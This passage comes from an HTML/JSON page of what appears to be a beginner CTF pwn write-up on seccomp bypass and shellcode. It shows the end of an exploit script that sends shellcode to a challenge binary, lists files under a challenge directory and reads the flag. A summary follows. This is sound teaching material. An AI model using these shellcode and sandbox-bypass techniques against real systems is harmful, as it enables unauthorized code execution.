punctuation\">}</span></span><span 
class=\"token string\">\n</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>write_asm<span class=\"token punctuation\">}</span></span><span class=\"token string\">\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>shellcode <span class=\"token operator\">+</span> <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token operator\">-</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>shellcode<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./payload\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><img src=\"/static/c87e5077608da42966ac5c8c71449aff/bbb77/image-20240628225954737.png\" alt=\"image-20240628225954737\" title=\"image-20240628225954737\" /></p>\n<p>In this code, after granting write and execute permission to the region starting at <code class=\"language-text\">0x404000</code>, Shell Code embedded in that region enumerates files under <code class=\"language-text\">/app/ctf4b</code>.</p>\n<p>Then, Shell Code containing the identified Flag file name is received again from input and executed to retrieve the Flag.</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>In this article I summarized what I learned about seccomp bypass techniques and Shell Code basics.</p>\n<p>There are likely other solutions to bypass the <code class=\"language-text\">execve</code> and <code class=\"language-text\">execveat</code> constraints, and I’d like to add alternative approaches in future updates.</p>","fields":{"slug":"/ctf-pwn-gachi-rop-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-06-28","description":"A Beginner CTFer's Pwn Crash Course 2 - seccomp Bypass and Shell Code Basics -","tags":["Rev (en)","Pwn (en)","English"],"title":"A Beginner CTFer's Pwn Crash Course 2 - seccomp Bypass and Shell Code Basics 
-","socialImage":{"publicURL":"/static/9462c8366543bfec55e4deb4c567ebd2/ctf-pwn-gachi-rop.png"}}}},"pageContext":{"slug":"/ctf-pwn-gachi-rop-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}